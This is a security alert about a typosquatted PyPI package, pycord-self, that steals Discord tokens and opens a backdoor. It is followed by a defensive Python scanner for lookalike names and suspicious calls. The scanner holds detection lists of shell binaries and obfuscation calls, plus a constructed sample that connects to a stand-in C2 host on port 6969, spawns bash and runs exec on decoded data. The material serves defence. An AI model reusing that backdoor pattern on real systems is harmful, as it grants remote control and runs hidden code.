Alert – Malicious PyPI Package Targets Discord Developers. Here is a quick look at what to know.
A malicious package named ‘pycord-self’ has been discovered on the Python Package Index (PyPI). The package targets Discord developers to steal authentication tokens and plant a backdoor that gives the attacker remote control over the system. It mimics the highly popular ‘discord.py-self,’ which has nearly 28 million downloads, and even offers the functionality of the legitimate project so that victims notice nothing unusual.
Official Package Overview
The official package is a Python library that allows communication with Discord’s user API and permits developers to control accounts programmatically. It is typically used for messaging and automating interactions, creating Discord bots, scripting automated moderation, notifications or responses, and running commands or retrieving data from Discord without a bot account.
Discovery and Impact
According to code security company Socket, the malicious package was added to PyPI last year in June and has been downloaded 885 times so far. At the time of writing, the package is still available on PyPI from a publisher whose details had been verified by the platform. Socket researchers analyzed the malicious package and found that pycord-self contains code that does two main things.
Token Theft and Backdoor Installation
First, it steals Discord authentication tokens from the victim and sends them to an external URL. Attackers can use a stolen token to hijack the developer’s Discord account without needing the account’s login credentials, even if two-factor authentication is enabled. Second, the malicious package sets up a stealthy backdoor by creating a persistent connection to a remote server on port 6969. Depending on the operating system, it launches a shell (bash on Linux or cmd on Windows) over that connection, which grants the attacker continuous access to the victim’s system.
Recommendations for Developers
Software developers are advised to avoid installing packages without checking that the code comes from the official author, especially for popular packages. Checking the exact name of the package also lowers the risk of falling victim to typosquatting. When working with open-source libraries, it is advisable to review the code for suspicious functions where possible and to avoid anything that appears obfuscated. Additionally, scanning tools can help detect and block malicious packages.
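As an added example (not from the article or from Socket), the following Python script applies those recommendations to a package before it is installed: it flags names that closely resemble a trusted package, and statically scans source for the call patterns the article describes (a connect() to port 6969, spawning bash or cmd, and dynamic-code helpers typical of obfuscation). The allow-list and the sample source are constructed for illustration.

```python
import ast
import difflib

TRUSTED_NAMES = ["discord.py-self", "discord.py", "requests"]  # constructed allow-list
# Indicators taken from the article's description of pycord-self.
SUSPICIOUS_PORTS = {6969}
SHELL_BINARIES = {"bash", "/bin/bash", "sh", "/bin/sh", "cmd", "cmd.exe"}
SPAWN_CALLS = {"Popen", "run", "call", "check_output", "system"}
OBFUSCATION_CALLS = {"exec", "eval", "b64decode", "decompress"}

def lookalikes(name, trusted=TRUSTED_NAMES, cutoff=0.6):
    """Trusted names the candidate resembles but does not equal (typosquat check)."""
    norm = name.lower().replace("_", "-")
    close = difflib.get_close_matches(norm, [t.lower() for t in trusted], n=3, cutoff=cutoff)
    return [t for t in close if t != norm]

def _callee(node):
    # Bare callee name of a Call node, e.g. 'connect' for sock.connect(...)
    func = node.func
    return func.attr if isinstance(func, ast.Attribute) else getattr(func, "id", "")

def suspicious_calls(source, filename="<package>"):
    """Return (lineno, reason) for calls matching the backdoor/obfuscation patterns."""
    findings = []
    for node in ast.walk(ast.parse(source, filename)):
        if not isinstance(node, ast.Call):
            continue
        name = _callee(node)
        literals = {n.value for n in ast.walk(node) if isinstance(n, ast.Constant)}
        ports, shells = literals & SUSPICIOUS_PORTS, literals & SHELL_BINARIES
        if name == "connect" and ports:
            findings.append((node.lineno, "connect() to port %s" % sorted(ports)))
        elif name in SPAWN_CALLS and shells:
            findings.append((node.lineno, "spawns a shell %s" % sorted(shells)))
        elif name in OBFUSCATION_CALLS:
            findings.append((node.lineno, "dynamic-code/obfuscation helper %s()" % name))
    return findings

# Constructed sample showing the call shapes the article describes; not the real package's code.
SAMPLE_SOURCE = """\
import socket, subprocess, base64
sock = socket.socket()
sock.connect(("c2.example.invalid", 6969))
subprocess.Popen(["bash"])
exec(base64.b64decode(blob))
"""

if __name__ == "__main__":
    print("lookalikes of pycord-self:", lookalikes("pycord-self"))
    print(*suspicious_calls(SAMPLE_SOURCE), sep="\n")
```

Run suspicious_calls over every .py file of the unpacked sdist or wheel before installing it; the lookalike check is only as good as the allow-list of vetted names you feed it.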
Conclusion
This incident highlights the importance of vigilance when using open-source libraries and the need for developers to verify the authenticity of packages before installation. By taking these precautions, developers can protect themselves and their systems from potential threats.